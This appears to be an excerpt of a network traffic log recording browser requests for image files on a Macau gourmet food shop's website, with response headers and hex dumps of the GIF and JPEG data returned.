                                                                                                                                                              X-Powered-By: ASP.NET
                                                                                                                                                              Date: Mon, 13 Mar 2023 04:26:48 GMT
                                                                                                                                                              Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 02 00 00 64 00 64 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 50 00 00 ff ee 00 0e 41 64 6f 62 65 00 64 c0 00 00 00 01 ff db 00 84 00 02 02 02 02 02 02 02 02 02 02 03 02 02 02 03 04 03 02 02 03 04 05 04 04 04 04 04 05 06 05 05 05 05 05 05 06 06 07 07 08 07 07 06 09 09 0a 0a 09 09 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 01 03 03 03 05 04 05 09 06 06 09 0d 0b 09 0b 0d 0f 0e 0e 0e 0e 0f 0f 0c 0c 0c 0c 0c 0f 0f 0c 0c 0c 0c 0c 0c 0f 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff c0 00 11 08 00 37 00 b9 03 01 11 00 02 11 01 03 11 01 ff c4 00 bb 00 01 00 01 05 01 01 01 00 00 00 00 00 00 00 00 00 00 06 03 04 07 08 09 05 01 02 01 01 00 01 05 01 01 00 00 00 00 00 00 00 00 00 00 00 05 01 02 03 04 06 07 08 10 00 01 03 02 02 04 0a 08 04 04 04 07 00 00 00 00 02 01 03 04 05 06 00 11 12 13 d4 07 21 31 d1 22 53 93 15 55 16 08 41 51 61 14 94 96 57 18 91 a1 32 23 71 81 c1 52 42 c2 33 24 b1 62 72 92 44 54 26 11 00 01 02 03 02 09 0b 02 03 06 05 05 00 00 00 00 01 00 02 11 03 04 21 12 31 51 61 91 52 13 05 15 06 f0 41 71 e1 22 92 d2 e2 53 93 14 81 32 a1 b1 07 c1 d1 42 b2 73 b3 62 72 82 33 63 f1 c2 23 24 34 ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 ea 16 f3 6f ca 94 da d4 fa 73 53 5f 85 45 a6 1a 30 51 e3 9e 81 be ee 59 af 3b 2e 04 cb 87 3f 46 3c 27 8a 36 b4 dd a7 59 36 5b 9c 75 2c 71 60 64 7b 24 b0 96 b9 ce 1f c4 4b 81 85 e8 80 00 85 b1 50 b5 f5 4e 0e 2d 04 80 31 61 25 62 6f 12 c8 4e 01 67 49 3d 0a 72 65 29 7f 35 17 85 3f 2c 72 bb ba 97 d1 67 74 28 df 96 fc b9 dd fb d3 c4 d2 7a 00 f8 89 9b 46 1b ba 97 d1 67 74 27 cc 99 c8 bb c4 9e 26 93 d0 07 c4 4c da 30 dd d4 be 8b 3b a1 3e 64 ce 45 de 24 f1 34 9e 80 3e 22 66 d1 86 ee a5 f4 59 dd 09 f3 26 72 2e f1 27 89 a4 f4 01 f1 13 36 8c 37 75 2f a2 ce e8 4f 99 33 91 77 89 3c 4d 27 a0 0f 88 99 b4 61 bb a9 7d 16 77 42 7c c9 9c 8b bc 49 e2 69 3d 00 7c 44 cd a3 0d dd 4b e8 b3 ba 13 e6 4c e4 5d e2 4f 13 49 e8 03 e2 26 6d 18 6e ea 5f 45 9d d0 9f 32 67 22 ef 12 78 9a 4f 40 1f 11 33 68 c3 77 52 fa 2c ee 84 f9 93 39 17 78 93 c4 d2 7a 00 f8 89 9b 46 1b ba 97 d1 67 74 27 cc 99 c8 bb c4 9e 26 93 d0 07 c4 4c da 30 dd d4 be 8b 3b a1 3e 64 ce 45 de 24 f1 34 9e 80 3e 22 66 d1 86 ee a5 f4 59 dd 09 f3 26 72 2e f1 27 89 a4 f4 01 f1 13 36 8c 37 75 2f a2 ce e8 4f 99 33 91 77 89 3c 4d 27 a0 0f 88 99 b4 61 bb a9 7d 16 77 42 7c c9 9c 8b bc 49 e2 69 3d 00 7c 44 cd a3 0d dd 4b e8 b3 ba 13 e6 4c e4 5d e2 4f 13 49 e8 03 e2 26 6d 18 6e ea 5f 45 9d d0 9f 32 67 22 ef 12 78 9a 4f 40 1f 11 33 68 c3 77 52 fa 2c ee 84 f9 93 39 17 78 93 c4 d2 7a 00 f8 89 9b 46 1b ba 97 d1 67 74 27 cc 99 c8 bb c4 9e 26 93 d0 07 c4 4c da 30 dd d4 be 8b 3b a1 3e 64 ce 45 de 24 f1 34 9e 80 3e 22 66 d1 86 ee a5 f4 59 dd 09 f3 26 72 2e f1 2a cc 5d 12 01 e6 dc cd e8 84 0a 8a 2f c5 92 fe 98 fb 51 1d 71 c4 5c bd 58 b9 94 54 ec 21 cc 96 d6 91 80 b4 5d 70 e8 22 d1 f4 55 6d 63 e3 69 23 a0 9f da 4a db 6d d5 dd d3 6e 3a 6c b8 95 47 7d e2 7d 31 dd 59 4b e2 d6 81 26 90 16 5e d1 54 5c 7b 17 02 ed a9 d5 b2 a6 c8 9e e2 f7 ca 2d 37 8e 12 c7 c6 ec 72 82 d7 08 f3 88 46 d8 ae 86 92 71 9a ce d6 10 60 b2 be 3b c5 b4
                                                                                                                                                              Data Ascii: JFIFddDuckyPAdobed7!1"SUAQaW2#qRB3$brDT&!1QaRAq"S2Bsbr3c#$4?osS_E0QY;.?F<'6Y6[u,q`d{$KPN-1a%boNgI=re)5?,rgt(zFgt'&L0;>dE$4>"fY&r.'67u/O3w<M'a}wB|Ii=|DKL]OI&mn_E2g"xO@3hwR,9xzFgt'&L0;>dE$4>"fY&r.'67u/O3w<M'a}wB|Ii=|DKL]OI&mn_E2g"xO@3hwR,9xzFgt'&L0;>dE$4>"fY&r.*]/Qq\XT!]p"Umci#Jmn:lG}}1YK&^T\{-7rFq`;
                                                                                                                                                              Mar 13, 2023 05:26:55.982795000 CET3085OUTGET /images/closelabel.gif HTTP/1.1
                                                                                                                                                              Host: www.gourmethousemacau.com
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                                                                                              Accept: */*
                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                              Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ; Hm_lvt_3eff88a357a8c5aca6bb583a65de2875=1678710370; Hm_lpvt_3eff88a357a8c5aca6bb583a65de2875=1678710390
                                                                                                                                                              Mar 13, 2023 05:26:56.187511921 CET3095INHTTP/1.1 200 OK
                                                                                                                                                              Content-Length: 979
                                                                                                                                                              Content-Type: image/gif
                                                                                                                                                              Last-Modified: Tue, 23 Aug 2022 04:15:22 GMT
                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                              ETag: "a026a6f6a6b6d81:615ba"
                                                                                                                                                              Server: Microsoft-IIS/6.0
                                                                                                                                                              X-Powered-By: ASP.NET
                                                                                                                                                              Date: Mon, 13 Mar 2023 04:27:01 GMT
                                                                                                                                                              Data Raw: 47 49 46 38 39 61 42 00 16 00 e6 00 00 c0 c0 c0 c1 c1 c1 9d 9d 9d 59 59 59 d2 d2 d2 83 83 83 af af af f5 f5 f5 e4 e4 e4 50 50 50 b8 b8 b8 8c 8c 8c 94 94 94 54 54 54 56 56 56 dc dc dc 52 52 52 c9 c9 c9 51 51 51 58 58 58 55 55 55 ec ec ec 53 53 53 f6 f6 f6 fd fd fd ea ea ea fa fa fa a6 a6 a6 57 57 57 a2 a2 a2 4c 4c 4c 4f 4f 4f 66 66 66 f7 f7 f7 dd dd dd cc cc cc 60 60 60 7b 7b 7b a1 a1 a1 fc fc fc f0 f0 f0 de de de 6c 6c 6c b5 b5 b5 fb fb fb 95 95 95 cd cd cd ca ca ca 78 78 78 eb eb eb 4b 4b 4b e0 e0 e0 5f 5f 5f b9 b9 b9 df df df b4 b4 b4 86 86 86 70 70 70 63 63 63 e5 e5 e5 92 92 92 88 88 88 a9 a9 a9 6e 6e 6e 97 97 97 6f 6f 6f d5 d5 d5 8e 8e 8e ed ed ed 65 65 65 76 76 76 98 98 98 6d 6d 6d 7c 7c 7c ef ef ef e7 e7 e7 b1 b1 b1 b3 b3 b3 f1 f1 f1 79 79 79 5a 5a 5a 64 64 64 4d 4d 4d 73 73 73 67 67 67 96 96 96 87 87 87 e3 e3 e3 4e 4e 4e 69 69 69 db db db 7a 7a 7a ff ff ff fe fe fe 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 21 f9 04 00 00 00 00 00 2c 00 00 00 00 42 00 16 00 00 07 ff 80 5c 82 83 84 85 86 87 88 89 8a 8b 8c 8d 8e 8f 8c 5d 92 93 94 95 96 97 97 90 5c 27 8d 98 9e 9f 98 91 92 5c 2c 47 42 5c 96 5c 23 02 1a a8 a0 af a0 a2 5d 21 40 1e 51 22 ae 5d 82 2e 34 1e 55 17 94 15 5a 08 b0 5d 08 c3 97 07 5a 5a ba 8b a3 4d 32 03 16 45 5a ae aa 24 0d 03 1e 3e 92 04 0b 5b e0 0b 04 5d 00 5b cc 95 00 05 e0 5b 05 00 94 0a eb 05 2f 5c 01 eb eb 83 a3 19 5b 1f 03 09 54 36 82 46 d0 b0 30 00 0b 0e 14 5d 22 6c 59 10 41 4b 84 02 06 c8 99 ab 64 60 0b 03 02 5a 08 30 d8 12 51 a2 81 8c 1b 2e d0 e3 18 a0 64 00 7c f9 4a 24 18 d0 40 c5 0c 17 d8 06 48 b1 12 02 55 81 02 07 26 e5 94 78 4e 12 82 2d 02 2a 09 98 38 94 92 a0 7a 0f 0e 19 ad 50 82 1f 05 24 d8 26 24 e8 21 b2 8b 96 2d ee 2c 95 eb c9 b3 d2 55 05 5d 2a 2a d8 79 74 4b 52 43 95 b8 c4 48 02 61 80 03 0e 03 ff 20 0c a9 29 69 eb 25 bb 93 8a 5a 02 da a5 82 ba 2d 1b 10 94 6d 21 a0 b0 02 94 46 51 18 a1 30 60 42 83 0e ad 26 e1 45 37 31 ef 96 4b 7c bb 1c 00 f0 cd ec 48 c2 86 11 4f e2 a2 24 08 63 96 0c 74 4d 22 80 f5 6e 65 49 f0 c6 51 62 9d 55 32 c7 91 67 0b a5 9d 31 25 1b 05 07 71 4d 60 70 75 e0 e6 4e 63 39 27 5b cd 6c 99 98 e6 49 40 71 2b 1d 9d 42 85 04 69 59 40 38 98 00 a1 c3 70 49 0a 19 3a 2c b0 60 33 47 00 e8 99 55 bc 98 71 23 d8 b0 ec 37 6c 39 59 cf 80 c9 00 44 04 51 07 71 3d 01 8c 2b 2f 38 b0 9d 04 c2 b9 e2 4d 3c e3 94 63 4f 56 e9 ac b3 40 6d 0d 82 73 d8 48 f6 78 66 8d 08 20 40 00 45 02 25 64 20 48 0d 02 4e 20 41 07 27 50 72 8c 73 af 9c 78 c9 32 39 45 c2 c5 03 3a ac e4 5f 0c a8 08 b2 82 04 1c 70 20 c3 0d c5 f4 98 8a 33 5c 38 c1 00 04 1f 6c e1 a1 51 2b 58 90 40 30 0e 22 f8 e8 e4 28 ce e8 c2 02 0f 4f 54 90 0b 94 4c fc b0 c3 95 4f c2 22 0b 17 1a 54 75 09 06 4b 70 d9 e5 2b b2 34 e3 89 7e 67 fa 98 66 8f 81 00 00 3b
                                                                                                                                                              Data Ascii: GIF89aBYYYPPPTTTVVVRRRQQQXXXUUUSSSWWWLLLOOOfff```{{{lllxxxKKK___pppcccnnnoooeeevvvmmm|||yyyZZZdddMMMsssgggNNNiiizzz!,B\]\'\,GB\\#]!@Q"].4UZ]ZZM2EZ$>[][[/\[T6F0]"lYAKd`Z0Q.d|J$@HU&xN-*8zP$&$!-,U]**ytKRCHa )i%Z-m!FQ0`B&E71K|HO$ctM"neIQbU2g1%qM`puNc9'[lI@q+BiY@8pI:,`3GUq#7l9YDQq=+/8M<cOV@msHxf @E%d HN A'Prsx29E:_p 3\8lQ+X@0"(OTLO"TuKp+4~gf;
                                                                                                                                                              Mar 13, 2023 05:27:04.317950964 CET3286OUTGET /images/icon_download.jpg HTTP/1.1
                                                                                                                                                              Host: www.gourmethousemacau.com
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                              Referer: http://www.gourmethousemacau.com/OurChocology.asp
                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                              Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ; Hm_lvt_3eff88a357a8c5aca6bb583a65de2875=1678710370; Hm_lpvt_3eff88a357a8c5aca6bb583a65de2875=1678710390
                                                                                                                                                              Mar 13, 2023 05:27:04.573075056 CET3308INHTTP/1.1 200 OK
                                                                                                                                                              Content-Length: 7088
                                                                                                                                                              Content-Type: image/jpeg
                                                                                                                                                              Last-Modified: Tue, 23 Aug 2022 04:15:23 GMT
                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                              ETag: "286c6ef7a6b6d81:615ba"
                                                                                                                                                              Server: Microsoft-IIS/6.0
                                                                                                                                                              X-Powered-By: ASP.NET
                                                                                                                                                              Date: Mon, 13 Mar 2023 04:27:10 GMT
                                                                                                                                                              Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 02 00 00 64 00 64 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 50 00 00 ff ee 00 0e 41 64 6f 62 65 00 64 c0 00 00 00 01 ff db 00 84 00 02 02 02 02 02 02 02 02 02 02 03 02 02 02 03 04 03 02 02 03 04 05 04 04 04 04 04 05 06 05 05 05 05 05 05 06 06 07 07 08 07 07 06 09 09 0a 0a 09 09 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 01 03 03 03 05 04 05 09 06 06 09 0d 0b 09 0b 0d 0f 0e 0e 0e 0e 0f 0f 0c 0c 0c 0c 0c 0f 0f 0c 0c 0c 0c 0c 0c 0f 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff c0 00 11 08 00 37 00 b9 03 01 11 00 02 11 01 03 11 01 ff c4 00 ba 00 00 01 03 05 01 00 00 00 00 00 00 00 00 00 00 00 00 05 06 08 01 03 04 07 09 02 01 00 01 05 01 01 01 00 00 00 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 10 00 01 03 02 04 02 04 0b 06 05 02 07 00 00 00 00 01 02 03 04 05 06 00 11 12 07 21 13 31 61 14 17 41 51 d1 22 94 d4 55 95 57 08 18 71 81 32 42 23 15 a1 b1 62 c2 16 91 82 52 72 92 a2 93 a3 54 11 00 01 02 03 03 08 07 06 02 09 02 07 00 00 00 00 01 02 03 00 11 04 21 12 05 31 41 51 a1 d1 d2 93 14 61 71 22 52 13 54 15 81 91 b1 32 06 16 c1 07 f0 42 72 82 b2 23 33 b3 24 e1 73 62 92 a2 53 63 c3 34 ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 eb 0e e2 ee 7d 5d aa bc ca 3d 16 71 a5 40 a7 14 a2 6c f6 d3 9b ca 74 82 74 37 c4 71 e1 e3 1d 78 f1 af a9 be a6 aa a9 ab 71 86 1c 2d b2 d9 bb d9 ec ad 4a 4d 8b ed 8e d0 01 5d 90 12 53 f2 92 4d b1 93 5b 5a a4 2a ea 6c 96 53 97 d8 23 57 77 99 70 8e 1f be d6 dc fe be da 84 67 fe de 4a bf 9e 39 6e 6e ab cc 3f c7 77 7e 33 fd 49 cd 27 56 ec 57 bc eb 87 db 55 bf 4f 47 ab e0 e6 ea bc c3 fc 77 77 e0 f5 27 34 9d 5b b0 77 9d 70 fb 6a b7 e9 e8 f5 7c 1c dd 57 98 7f 8e ee fc 1e a4 e6 93 ab 76 0e f3 ae 1f 6d 56 fd 3d 1e af 83 9b aa f3 0f f1 dd df 83 d4 9c d2 75 6e c1 de 75 c3 ed aa df a7 a3 d5 f0 73 75 5e 61 fe 3b bb f0 7a 93 9a 4e ad d8 3b ce b8 7d b5 5b f4 f4 7a be 0e 6e ab cc 3f c7 77 7e 0f 52 73 49 d5 bb 07 79 d7 0f b6 ab 7e 9e 8f 57 c1 cd d5 79 87 f8 ee ef c1 ea 4e 69 3a b7 60 ef 3a e1 f6 d5 6f d3 d1 ea f8 39 ba af 30 ff 00 1d dd f8 3d 49 cd 27 56 ec 1d e7 5c 3e da ad fa 7a 3d 5f 07 37 55 e6 1f e3 bb bf 07 a9 39 a4 ea dd 83 bc eb 87 db 55 bf 4f 47 ab e0 e6 ea bc c3 fc 77 77 e0 f5 27 34 9d 5b b0 77 9d 70 fb 6a b7 e9 e8 f5 7c 1c dd 57 98 7f 8e ee fc 1e a4 e6 93 ab 76 0e f3 ae 1f 6d 56 fd 3d 1e af 83 9b aa f3 0f f1 dd df 83 d4 9c d2 75 6e c1 de 75 c3 ed aa df a7 a3 d5 f0 73 75 5e 61 fe 3b bb f0 7a 93 9a 4e ad d8 3b ce b8 7d b5 5b f4 f4 7a be 0e 6e ab cc 3f c7 77 7e 0f 52 73 49 d5 bb 07 79 d7 0f b6 ab 7e 9e 8f 57 c1 cd d5 79 87 f8 ee ef c1 ea 4e 69 3a b7 60 ef 3a e1 f6 d5 6f d3 d1 ea f8 39 ba af 30 ff 00 1d dd f8 3d 49 cd 27 56 ec 1d e7 5c 3e da ad fa 7a 3d 5f 07 37 55 e6 1f e3 bb bf 07 a9 39 a4 ea dd 83 bc eb 87 db 55 bf 4f 47 ab e0 e6 ea bc c3 fc 77 77 e0 f5 27 34 9d 5b b0 77 9d 70 fb 6a b7 e9 e8 f5 7c 1c dd 57 98 7f 8e ee fc 1e a4 e6 93 ab 76 0e f3 ae 1f 6d 56 fd 3d 1e af 83 9b aa f3 0f f1 dd df 83 d4 9c d2 75 6e c5 d6 37 3a e2 0f 36 a1 71 55 a3 94 91 92 9f 7d 32 5b ff 00 7a 03 6d 9c bc 78 7a 2b ea d0 42 93 52 f8 23 4b ae 28 7f ca a5 14 9f 68 30 e4
                                                                                                                                                              Data Ascii: JFIFddDuckyPAdobed7!1aAQ"UWq2B#bRrT!1AQaq"RT2Br#3$sbSc4?}]=q@ltt7qxq-JM]SM[Z*lS#WwpgJ9nn?w~3I'VWUOGww'4[wpj|WvmV=unusu^a;zN;}[zn?w~RsIy~WyNi:`:o90=I'V\>z=_7U9UOGww'4[wpj|WvmV=unusu^a;zN;}[zn?w~RsIy~WyNi:`:o90=I'V\>z=_7U9UOGww'4[wpj|WvmV=un7:6qU}2[zmxz+BR#K(h0
                                                                                                                                                              Mar 13, 2023 05:27:04.593529940 CET3326OUTGET /images/icon_download.jpg HTTP/1.1
                                                                                                                                                              Host: www.gourmethousemacau.com
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                                                                                              Accept: */*
                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                              Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ; Hm_lvt_3eff88a357a8c5aca6bb583a65de2875=1678710370; Hm_lpvt_3eff88a357a8c5aca6bb583a65de2875=1678710390
                                                                                                                                                              Mar 13, 2023 05:27:04.798674107 CET3353INHTTP/1.1 200 OK
                                                                                                                                                              Content-Length: 7088
                                                                                                                                                              Content-Type: image/jpeg
                                                                                                                                                              Last-Modified: Tue, 23 Aug 2022 04:15:23 GMT
                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                              ETag: "286c6ef7a6b6d81:615ba"
                                                                                                                                                              Server: Microsoft-IIS/6.0
                                                                                                                                                              X-Powered-By: ASP.NET
                                                                                                                                                              Date: Mon, 13 Mar 2023 04:27:10 GMT
                                                                                                                                                              Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 02 00 00 64 00 64 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 50 00 00 ff ee 00 0e 41 64 6f 62 65 00 64 c0 00 00 00 01 ff db 00 84 00 02 02 02 02 02 02 02 02 02 02 03 02 02 02 03 04 03 02 02 03 04 05 04 04 04 04 04 05 06 05 05 05 05 05 05 06 06 07 07 08 07 07 06 09 09 0a 0a 09 09 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 01 03 03 03 05 04 05 09 06 06 09 0d 0b 09 0b 0d 0f 0e 0e 0e 0e 0f 0f 0c 0c 0c 0c 0c 0f 0f 0c 0c 0c 0c 0c 0c 0f 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff c0 00 11 08 00 37 00 b9 03 01 11 00 02 11 01 03 11 01 ff c4 00 ba 00 00 01 03 05 01 00 00 00 00 00 00 00 00 00 00 00 00 05 06 08 01 03 04 07 09 02 01 00 01 05 01 01 01 00 00 00 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 10 00 01 03 02 04 02 04 0b 06 05 02 07 00 00 00 00 01 02 03 04 05 06 00 11 12 07 21 13 31 61 14 17 41 51 d1 22 94 d4 55 95 57 08 18 71 81 32 42 23 15 a1 b1 62 c2 16 91 82 52 72 92 a2 93 a3 54 11 00 01 02 03 03 08 07 06 02 09 02 07 00 00 00 00 01 02 03 00 11 04 21 12 05 31 41 51 a1 d1 d2 93 14 61 71 22 52 13 54 15 81 91 b1 32 06 16 c1 07 f0 42 72 82 b2 23 33 b3 24 e1 73 62 92 a2 53 63 c3 34 ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 eb 0e e2 ee 7d 5d aa bc ca 3d 16 71 a5 40 a7 14 a2 6c f6 d3 9b ca 74 82 74 37 c4 71 e1 e3 1d 78 f1 af a9 be a6 aa a9 ab 71 86 1c 2d b2 d9 bb d9 ec ad 4a 4d 8b ed 8e d0 01 5d 90 12 53 f2 92 4d b1 93 5b 5a a4 2a ea 6c 96 53 97 d8 23 57 77 99 70 8e 1f be d6 dc fe be da 84 67 fe de 4a bf 9e 39 6e 6e ab cc 3f c7 77 7e 33 fd 49 cd 27 56 ec 57 bc eb 87 db 55 bf 4f 47 ab e0 e6 ea bc c3 fc 77 77 e0 f5 27 34 9d 5b b0 77 9d 70 fb 6a b7 e9 e8 f5 7c 1c dd 57 98 7f 8e ee fc 1e a4 e6 93 ab 76 0e f3 ae 1f 6d 56 fd 3d 1e af 83 9b aa f3 0f f1 dd df 83 d4 9c d2 75 6e c1 de 75 c3 ed aa df a7 a3 d5 f0 73 75 5e 61 fe 3b bb f0 7a 93 9a 4e ad d8 3b ce b8 7d b5 5b f4 f4 7a be 0e 6e ab cc 3f c7 77 7e 0f 52 73 49 d5 bb 07 79 d7 0f b6 ab 7e 9e 8f 57 c1 cd d5 79 87 f8 ee ef c1 ea 4e 69 3a b7 60 ef 3a e1 f6 d5 6f d3 d1 ea f8 39 ba af 30 ff 00 1d dd f8 3d 49 cd 27 56 ec 1d e7 5c 3e da ad fa 7a 3d 5f 07 37 55 e6 1f e3 bb bf 07 a9 39 a4 ea dd 83 bc eb 87 db 55 bf 4f 47 ab e0 e6 ea bc c3 fc 77 77 e0 f5 27 34 9d 5b b0 77 9d 70 fb 6a b7 e9 e8 f5 7c 1c dd 57 98 7f 8e ee fc 1e a4 e6 93 ab 76 0e f3 ae 1f 6d 56 fd 3d 1e af 83 9b aa f3 0f f1 dd df 83 d4 9c d2 75 6e c1 de 75 c3 ed aa df a7 a3 d5 f0 73 75 5e 61 fe 3b bb f0 7a 93 9a 4e ad d8 3b ce b8 7d b5 5b f4 f4 7a be 0e 6e ab cc 3f c7 77 7e 0f 52 73 49 d5 bb 07 79 d7 0f b6 ab 7e 9e 8f 57 c1 cd d5 79 87 f8 ee ef c1 ea 4e 69 3a b7 60 ef 3a e1 f6 d5 6f d3 d1 ea f8 39 ba af 30 ff 00 1d dd f8 3d 49 cd 27 56 ec 1d e7 5c 3e da ad fa 7a 3d 5f 07 37 55 e6 1f e3 bb bf 07 a9 39 a4 ea dd 83 bc eb 87 db 55 bf 4f 47 ab e0 e6 ea bc c3 fc 77 77 e0 f5 27 34 9d 5b b0 77 9d 70 fb 6a b7 e9 e8 f5 7c 1c dd 57 98 7f 8e ee fc 1e a4 e6 93 ab 76 0e f3 ae 1f 6d 56 fd 3d 1e af 83 9b aa f3 0f f1 dd df 83 d4 9c d2 75 6e c5 d6 37 3a e2 0f 36 a1 71 55 a3 94 91 92 9f 7d 32 5b ff 00 7a 03 6d 9c bc 78 7a 2b ea d0 42 93 52 f8 23 4b ae 28 7f ca a5 14 9f 68 30 e4
                                                                                                                                                              Data Ascii: JFIFddDuckyPAdobed7!1aAQ"UWq2B#bRrT!1AQaq"RT2Br#3$sbSc4?}]=q@ltt7qxq-JM]SM[Z*lS#WwpgJ9nn?w~3I'VWUOGww'4[wpj|WvmV=unusu^a;zN;}[zn?w~RsIy~WyNi:`:o90=I'V\>z=_7U9UOGww'4[wpj|WvmV=unusu^a;zN;}[zn?w~RsIy~WyNi:`:o90=I'V\>z=_7U9UOGww'4[wpj|WvmV=un7:6qU}2[zmxz+BR#K(h0
                                                                                                                                                              Mar 13, 2023 05:27:22.214724064 CET3450OUTGET /images/productMain_icon.jpg HTTP/1.1
                                                                                                                                                              Host: www.gourmethousemacau.com
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                              Referer: http://www.gourmethousemacau.com/OurProducts.asp
                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                              Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ; Hm_lvt_3eff88a357a8c5aca6bb583a65de2875=1678710370; Hm_lpvt_3eff88a357a8c5aca6bb583a65de2875=1678710390
                                                                                                                                                              Mar 13, 2023 05:27:22.419254065 CET3457INHTTP/1.1 200 OK
                                                                                                                                                              Content-Length: 5536
                                                                                                                                                              Content-Type: image/jpeg
                                                                                                                                                              Last-Modified: Tue, 23 Aug 2022 04:15:26 GMT
                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                              ETag: "9a831f9a6b6d81:615ba"
                                                                                                                                                              Server: Microsoft-IIS/6.0
                                                                                                                                                              X-Powered-By: ASP.NET
                                                                                                                                                              Date: Mon, 13 Mar 2023 04:27:27 GMT
                                                                                                                                                              Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 02 00 00 64 00 64 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 50 00 00 ff ee 00 0e 41 64 6f 62 65 00 64 c0 00 00 00 01 ff db 00 84 00 02 02 02 02 02 02 02 02 02 02 03 02 02 02 03 04 03 02 02 03 04 05 04 04 04 04 04 05 06 05 05 05 05 05 05 06 06 07 07 08 07 07 06 09 09 0a 0a 09 09 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 01 03 03 03 05 04 05 09 06 06 09 0d 0b 09 0b 0d 0f 0e 0e 0e 0e 0f 0f 0c 0c 0c 0c 0c 0f 0f 0c 0c 0c 0c 0c 0c 0f 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff c0 00 11 08 00 28 00 c8 03 01 11 00 02 11 01 03 11 01 ff c4 00 ad 00 01 00 01 04 03 01 00 00 00 00 00 00 00 00 00 00 00 06 03 04 05 07 01 02 08 09 01 01 00 02 03 01 01 01 00 00 00 00 00 00 00 00 00 00 03 05 01 02 04 06 07 08 10 00 01 03 01 04 04 0c 04 04 04 07 00 00 00 00 00 03 01 02 04 05 00 11 12 06 21 13 15 07 31 52 92 d2 93 d3 14 54 94 55 16 18 41 51 22 08 61 71 81 32 a1 62 c2 23 91 42 72 82 a2 c3 24 11 00 01 02 03 05 04 08 06 02 01 03 05 00 00 00 00 01 11 02 00 03 04 21 51 d1 12 92 31 52 14 05 41 61 a1 d2 53 15 06 17 71 81 91 c1 22 13 b1 32 f1 f0 23 63 42 b2 33 43 07 ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 fa 69 bc 6c fd 58 9b 5c a9 44 5a 99 a0 d2 29 e7 ec d1 e1 c5 5c 2e 33 91 a8 e5 72 af 02 5c 8e 4b d5 6f e1 e0 b7 c0 bd 43 cd 67 f3 2a c9 cd 9a e3 fa d9 31 ec 6b 01 21 89 2d c5 8a e0 0a 39 ce 2d 25 5c a8 a8 12 29 2b aa 5e 1e 5a 0a 01 76 d3 62 c6 b0 f5 2b 93 f6 a4 97 27 cd f3 0a ab ff 00 1c 29 fc 2d e7 3c b6 97 c2 66 91 84 57 71 4e bd da 8c 3d 4c 4e 